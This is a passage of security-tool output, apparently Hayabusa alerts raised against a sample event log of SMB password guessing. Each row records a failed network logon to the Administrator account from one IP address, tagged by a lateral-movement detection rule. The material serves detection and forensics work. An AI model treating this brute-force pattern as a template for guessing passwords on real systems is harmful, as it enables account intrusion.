NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:23.076 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 43m0nfi5tiv4TpSB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:23.107 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qjPyJXl984vViV6L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:23.143 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MomQ8Yt51VsMiO4p | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:23.175 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LJYCi5r2otMHxA8f | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:23.211 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4oUSkMBI8SGDLwYC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:23.251 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j1x3lyRjxn73KITB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:23.283 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gh05BhGpwq1ho62a | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:23.324 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bxj6ITbiciyRNLbF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:23.370 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Uev2mjCaqHjm6NYi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:23.415 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: L4WU383o9E5JyM5V | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:23.450 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lfMv0lsoiRnTCFXe | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:23.504 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XL4ahBqUyGeTONkE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:23.549 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8hJ888Kmyi6KqIPn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:23.596 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VZ6sfYMHuygnMdY2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:23.636 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XkuSlyTNc5OOoUtd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:23.676 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5Z13YmupcMato8Sd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:23.733 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JedeMnLPnRJEwhZ9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:23.810 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mmy0c0wFheIRzSo4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:23.920 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sskKdqku5S0f1sWm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:23.962 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 15Qg0nCXNj7Ub1Sj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:24.004 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZD6iuaqv70k69G87 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:24.051 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gk3UuqTJmvH1snmN | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:24.092 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zaw9iF5mJlyygdnB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:24.128 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Sr5PZAd1qMc7hi3c | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:24.167 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: l5xbQtyueVq3fJSG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:24.203 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: g2nP0zz2ofBxTGw6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:24.237 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SYJheREJmEwj0791 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:24.277 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: exglD9fnLwaqwRZn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:24.325 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8bSAU1QjasDAsmry | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:24.363 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cfnrtXR7evQBbaOw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:24.410 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KYAwjW99chcntPsQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:24.464 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rG2PYfOTfT7QvbPu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:24.508 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FojDtfDNXq0gQfYu | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:24.549 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SUTT0QycbFtyJfNL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:24.596 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gcbv1lrcYdT9Wuli | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:24.636 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pjdFfvCCfGXo7FUf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:24.697 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rzqGdWlGglLQx6Z4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:24.749 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V3Rt80PMk70sVqbk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:24.795 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: okunzcEHnxUml4SG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:24.842 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qH0AY3DeIryuHSiN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:24.886 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DjqtxY5Fly4qAusS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:24.935 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PXHYu7wAqo7m6mZn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:24.990 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UaEM3boErBRrCbna | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:25.040 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7nSzwstH2imPjwah | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:25.153 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9Z6NM0I4vRTXlLKu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:25.193 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jYhjN3f8KlFIEUKy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:25.232 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qWicYt2HXLDgc3kc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:25.269 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Uz7yqqxdMrsM2L1g | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:25.308 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wqKTguT2Z3OPCxGR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:25.352 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ywpwCM4u6nFSq9oS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:25.407 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: k1t5ZBw3HOxux65e | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:25.534 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MtLFQSltjjOjdl2c | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:25.593 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AyFD3cjef0NUMZZ5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:25.656 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uDYECnF1YTKRKA3K | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:25.700 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pfqxcIVpX9BbsPIM | IP Addr: 192.168.198.149 | AuthPackage: 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gDFnG1gv7jOeIQ0t | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:31.454 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QdFKkcNpkfAScnkp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:31.511 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IAYbV4ioewwkZSmy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:31.557 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1bQ2Dxd6nlgSXJpo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:31.596 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: havLyoVCfdCqzrqO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:31.648 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b2vZLhz19pXrq9iE | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:31.688 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: A4TSN93DrSWb1ah4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:31.718 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QwFyrxiceLRTD9rI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:31.762 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ARbqo84Mr5T3ltRg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:31.901 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 34HpQJO17IDWber9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:31.978 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bSSbqOtdSeH58oIp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:32.009 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EMvTo7fU6J468WE9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:32.051 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8gzx6Vr9LoInM1df | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:32.096 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kwXC2S4HwdwNE6SX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:32.136 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1pQa1WxSt3bj9LEv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:32.185 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fm65jq9tRQznmWPh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:32.237 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zd8BJbXvEoaDADLc | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:32.280 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: P0JlFw7S6jFUt4Iy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:32.313 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rfMbFXQcP5sA2wmf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:32.349 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Xu4pgyCcDjl9h0Et | IP Addr: 192.168.198.149 | AuthPackage: 